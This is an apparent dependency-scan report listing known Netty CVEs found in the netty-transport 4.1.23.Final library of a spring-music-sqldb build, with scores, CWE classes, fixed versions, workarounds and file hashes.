af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2021-21290 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty before version 4.1.59.Final there is a vulnerability on Unix-like systems involving an insecure temp file. When netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. On unix-like systems, the temporary directory is shared between all user. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems. The method "File.createTempFile" on unix-like systems creates a random file, but, by default will create this file with the permissions "-rw-r--r--". Thus, if sensitive information is written to this file, other local users can read this information. This is the case in netty's "AbstractDiskHttpData" is vulnerable. This has been fixed in version 4.1.59.Final. As a workaround, one may specify your own "java.io.tmpdir" when you start the JVM or use "DefaultHttpDataFactory.setBaseDir(...)" to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Insecure Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:1.8/RC:R/MAV:A CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N References:
OSSINDEX - [CVE-2021-21290] CWE-378: Creation of Temporary File With Insecure Permissions OSSINDEX - [CVE-2021-21290] CWE-378: Creation of Temporary File With Insecure Permissions OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21290 OSSIndex - https://github.com/netty/netty/security/advisories/GHSA-5mcr-gq6c-3hq2 af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security-advisories@github.com - EXPLOIT,THIRD_PARTY_ADVISORY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2022-24823 suppress
Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use DefaultHttpDataFactory.setBaseDir(...) to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Insecure Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:1.8/RC:R/MAV:A CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,MITIGATION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,MITIGATION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security-advisories@github.com - EXPLOIT,MITIGATION,THIRD_PARTY_ADVISORY security-advisories@github.com - EXPLOIT,MITIGATION,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2025-25193 suppress
Netty, an asynchronous, event-driven network application framework, has a vulnerability in versions up to and including 4.1.118.Final. An unsafe reading of environment file could potentially cause a denial of service in Netty. When loaded on an Windows application, Netty attempts to load a file that does not exist. If an attacker creates such a large file, the Netty application crash. A similar issue was previously reported as CVE-2024-47535. This issue was fixed, but the fix was incomplete in that null-bytes were not counted against the input limit. Commit d1fbda62d3a47835d3fb35db8bd42ecc205a5386 contains an updated fix. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:1.8/RC:R/MAV:A References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: netty-transport-4.1.23.Final.jarDescription:
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers and clients. License:
http://www.apache.org/licenses/LICENSE-2.0 File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/netty-transport-4.1.23.Final.jar
MD5: b526820b1d947bfd1a0155cf97cae3de
SHA1: 80dfcc723083e23058878ddbc33f5fb0ce9ec9e9
SHA256: 93ca3532c7906f7331260ba34f879bb2da933ff855cccda7eda61caced54346f
Evidence Type Source Name Value Confidence Vendor file name netty-transport High Vendor jar package name io Highest Vendor jar package name netty Highest Vendor Manifest automatic-module-name io.netty.transport Medium Vendor Manifest bundle-docurl http://netty.io/ Low Vendor Manifest bundle-symbolicname io.netty.transport Medium Vendor Manifest implementation-url http://netty.io/netty-transport/ Low Vendor Manifest Implementation-Vendor The Netty Project High Vendor Manifest Implementation-Vendor-Id io.netty Medium Vendor pom artifactid netty-transport Low Vendor pom groupid io.netty Highest Vendor pom name Netty/Transport High Vendor pom parent-artifactid netty-parent Low Product file name netty-transport High Product jar package name io Highest Product jar package name netty Highest Product Manifest automatic-module-name io.netty.transport Medium Product Manifest bundle-docurl http://netty.io/ Low Product Manifest Bundle-Name Netty/Transport Medium Product Manifest bundle-symbolicname io.netty.transport Medium Product Manifest Implementation-Title Netty/Transport High Product Manifest implementation-url http://netty.io/netty-transport/ Low Product pom artifactid netty-transport Highest Product pom groupid io.netty Highest Product pom name Netty/Transport High Product pom parent-artifactid netty-parent Medium Version Manifest Bundle-Version 4.1.23.Final High Version Manifest Implementation-Version 4.1.23.Final High Version pom version 4.1.23.Final Highest
Related Dependencies spring-music-sqldb-1.0.jar: netty-buffer-4.1.23.Final.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/netty-buffer-4.1.23.Final.jar MD5: 734215aaca6fb8826a972a6838bbc51d SHA1: 0c6c0705bbd5d68aebc2d5fdd48e9dda8a8ad6d3 SHA256: db3e3f80069d5877ca6cc5525dce68d7399f4fe060bea6ee0b0a397f3a728973 pkg:maven/io.netty/netty-buffer@4.1.23.Final spring-music-sqldb-1.0.jar: netty-handler-4.1.23.Final.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/netty-handler-4.1.23.Final.jar MD5: 1c8913130cfae6ae25712e0bdb6f630c SHA1: a6314d244dd11db14249dc2d492e8dd3eec4cdb1 SHA256: 9aaea84da111fbb659b58a90074f670c7b2bb959802d5795ce2407588781fd2d pkg:maven/io.netty/netty-handler@4.1.23.Final spring-music-sqldb-1.0.jar: netty-resolver-4.1.23.Final.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/netty-resolver-4.1.23.Final.jar MD5: 017ed4a56b4cefe2662b6e6ee98f5d81 SHA1: 19adaf9ad6833da7506cdccc7c6d16952f366fa5 SHA256: 8b3566b9ec64349ed05c3ff38de4647fd25f5a91ebf71f9a71d2dc804cb0ce1f pkg:maven/io.netty/netty-resolver@4.1.23.Final CVE-2019-20444 suppress
HttpObjectDecoder.java in Netty before 4.1.44 allows an HTTP header that lacks a colon, which might be interpreted as a separate header with an incorrect syntax, or might be interpreted as an "invalid fold." CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2019-20445 suppress
HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2019-16869 suppress
Netty before 4.1.42.Final mishandles whitespace before the colon in HTTP headers (such as a "Transfer-Encoding : chunked" line), which leads to HTTP request smuggling. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-11612 suppress
The ZlibDecoders in Netty 4.1.x before 4.1.46 allow for unbounded memory allocation while decoding a ZlibEncoded byte stream. An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free memory to a single decoder. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
OSSINDEX - [CVE-2020-11612] CWE-789: Uncontrolled Memory Allocation OSSIndex - https://github.com/netty/netty/issues/9924 af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2021-37136 suppress
The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2021-37137 suppress
The Snappy frame decoder function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2022-41881 suppress
Netty project is an event-driven asynchronous network application framework. In versions prior to 4.1.86.Final, a StackOverflowError can be raised when parsing a malformed crafted message due to an infinite recursion. This issue is patched in version 4.1.86.Final. There is no workaround, except using a custom HaProxyMessageDecoder. CWE-674 Uncontrolled Recursion
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2023-44487 suppress
CISA Known Exploited Vulnerability: Product: IETF HTTP/2 Name: HTTP/2 Rapid Reset Attack Vulnerability Date Added: 2023-10-10 Description: HTTP/2 contains a rapid reset vulnerability that allows for a distributed denial-of-service attack (DDoS). Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable. Due Date: 2023-10-31 Notes: This vulnerability affects a common open-source component, third-party library, or protocol used by different products. For more information, please see: HTTP/2 Rapid Reset Vulnerability, CVE-2023-44487 | CISA: https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487; https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/; https://nvd.nist.gov/vuln/detail/CVE-2023-44487
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CWE-400 Uncontrolled Resource Consumption, NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PRESS/MEDIA_COVERAGE af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY 